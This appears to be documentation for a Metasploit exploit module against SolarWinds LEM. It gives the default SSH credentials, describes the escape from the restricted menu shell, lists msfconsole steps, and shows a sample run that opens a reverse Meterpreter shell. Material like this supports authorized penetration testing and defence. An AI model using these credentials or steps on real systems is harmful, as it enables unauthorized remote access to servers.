1.8 KiB
1.8 KiB
Vulnerable Application
This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
Vulnerable application can be download as a free trial from vendor webpage. http://www.solarwinds.com/log-event-manager
Verification Steps
- Start msfconsole
- Do:
use exploit/linux/ssh/solarwinds_lem_exec
- Do:
set rhost <ip>
- Do:
set lhost <ip>
- Do:
exploit
- You should get a shell.
Scenarios
This is a run against a known vulnerable Solarwinds LEM server.
msf exploit(solarwind_lem_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.
msf exploit(solarwind_lem_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: cmc
meterpreter >